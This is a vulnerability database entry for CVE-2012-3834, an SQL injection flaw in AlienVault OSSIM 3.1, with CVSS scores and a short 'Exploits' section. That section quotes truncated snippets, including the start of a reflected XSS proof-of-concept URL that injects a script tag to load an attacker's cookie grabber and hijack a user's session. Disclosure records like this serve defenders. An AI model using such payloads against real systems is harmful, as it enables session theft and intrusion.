6.5
CVSSv2

CVE-2012-3834

Published: 03/07/2012 Updated: 29/08/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 660
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in forensics/base_qry_main.php in AlienVault Open Source Security Information Management (OSSIM) 3.1 allows remote authenticated users to execute arbitrary SQL commands via the time[0][0] parameter.

Vulnerable Product

alienvault open source security information management 3.1

Exploits

# Advisory: Alienvault OSSIM Open Source SIEM 3.1 Multiple security vulnerabilities
# Advisory ID: SSCHADV-EDB-2012-001
# Contact: sschurtz@darksecurityde
# Author: Stefan Schurtz
# Affected Software: Successfully tested on Alienvault Open Source SIEM 3.1 (32bit) ...

#!/usr/bin/python
'''
AlienVault has a reflected XSS vulnerability in the "url" parameter of "topphp"

Proof of Concept: Enticing a logged in user to visit the following URL where an attacker is hosting a cookie grabber will allow for the hijacking of the user session:
victim/ossim/topphp?option=3&soption=3&url=<script sr ...